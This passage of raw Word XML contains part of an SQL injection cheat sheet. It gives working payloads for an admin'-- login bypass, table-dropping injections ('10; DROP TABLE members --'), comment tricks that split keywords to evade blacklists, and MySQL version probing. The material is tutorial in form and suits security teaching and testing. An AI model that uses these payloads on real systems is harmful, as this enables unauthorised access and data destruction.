            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>SQL Server log bypass using sp_password</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1A503EBB"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77" w:anchor="SQLInjectionQuickChecks" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Tests to check if SQL injection is possible</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="138356A4"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78" w:anchor="MySQLInjectionTips" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Tips and tricks for working with MySQL</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="309F88BA"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79" w:anchor="UsefulMySQLFunctions" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Useful MySQL functions</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="734D156B"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80" w:anchor="SecondOrderSQLInjection" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Second-order SQL injections</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6F3B9F82"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81" w:anchor="ForcingSQLServerNTLMHashes" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Forcing SQL Server to get NTLM hashes</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5D631EF5"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82" w:anchor="BulkInsertFromUNCShare" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Bulk insert from a UNC share</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3EA78A06" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E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83" w:anchor="OutOfBandChannelAttacks" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Out-of-band channel attacks</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3C66ED09"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84" w:anchor="OutOfBandInjectionSQLServer" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Out-of-band injections for SQL Server</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="53A0387A"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85" w:anchor="OutOfBandInjectionMySQLWindows" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Out-of-band injections for MySQL on Windows</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="44A381BA" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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hyperlink r:id="rId86" w:anchor="OutOfBandInjectionOracle" w:history="1">
        <w:r w:rsidRPr="00BF4E67">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Out-of-band injections for Oracle</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4FB49B81"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bookmarkStart w:id="2" w:name="21"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SQL injection 101: Injecting comments to manipulate queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBE8305"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bookmarkStart w:id="3" w:name="LineComments"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Line comments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB54AE1"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Put a line comment at the end to comment out the rest of the query. Line comments are typically used to ignore the rest of the original query so you don’t need to worry about ensuring valid syntax after the injection point.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F068170" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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lastRenderedPageBreak/>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> (SMPOL) </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DROP sampletable;-- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A08E82" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> (M) </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DROP sampletable;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658815D9" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:spacing w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="LineCommentAttacks"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>A common example is logging in as admin:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BB1327" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E6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Injection into the </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> parameter with a single quote: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>admin'--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DA9989" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E6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 FROM members WHERE username = '</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>admin'--</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>' AND password = 'password' </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>If successful, this will log you as the admin user because the rest of the SQL query after </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> will be ignored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4440D27E"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bookmarkStart w:id="5" w:name="InlineComments"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Inline comments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D80EAF"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You can use inline comments to comment out the rest of a query as with line comments (by simply not closing the comment). They are also useful for manipulating characters to bypass filtering/blacklisting, remove spaces, and obfuscate queries. In MySQL, you can use its special comment syntax to detect the database and version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB7FA0F"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Generic SQL comment syntax is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4900EAEA" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E6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/*Comment Here*/</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> (SMPOL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4340E834"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Typical uses of inline comments:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C18DA86" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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Obfuscation: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DROP/*comment*/sampletable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50841308" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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Breaking up a keyword to avoid filters: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DR/**/OP/*bypass blacklisting*/sampletable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DAF744" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">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Removing space characters: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SELECT/*avoid-spaces*/password/**/FROM/**/Members</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4CD1FA"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For MySQL only, you can use special comment syntax:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2061C6" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E6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 MYSQL special comment format */</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> (M) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2753CFCF"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This special comment syntax is perfect for detecting that MySQL is being used because any instructions you put in this comment will only execute in MySQL. You can even use this to detect the version. The following example will execute and generate an error only is the server uses MySQL in the specified version or later:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5557FABC"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Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SELECT /*!</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>80027</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> 1/0, */ 1 FROM tablename</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3AE387" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="InlineSamples"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Classic inline comment SQL injection attack samples</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3774BC" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E6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ID value: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>10; DROP TABLE members /*</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>Simply get rid of other stuff at the end the of query. Same as </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>10; DROP TABLE members --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2385F6BD" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E6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w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>80027</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> 1/0, */ 1 FROM tablename</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/>
        <w:t>Will throw an </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>division by 0 error </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>if MySQL version is higher than </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>8.0.27</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65576B1A" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E67">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="MySQLInlineSamples"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MySQL version detection sample attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B4B85B" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E6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ID value: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/*!</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>80027</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> 10*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61117B2F" w14:textId="77777777" w:rsidR="00BF4E67" w:rsidRPr="00BF4E67" w:rsidRDefault="00BF4E67" w:rsidP="00BF4E6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ID value: </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="DDDDDD" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF4E67">
        <w:rPr>
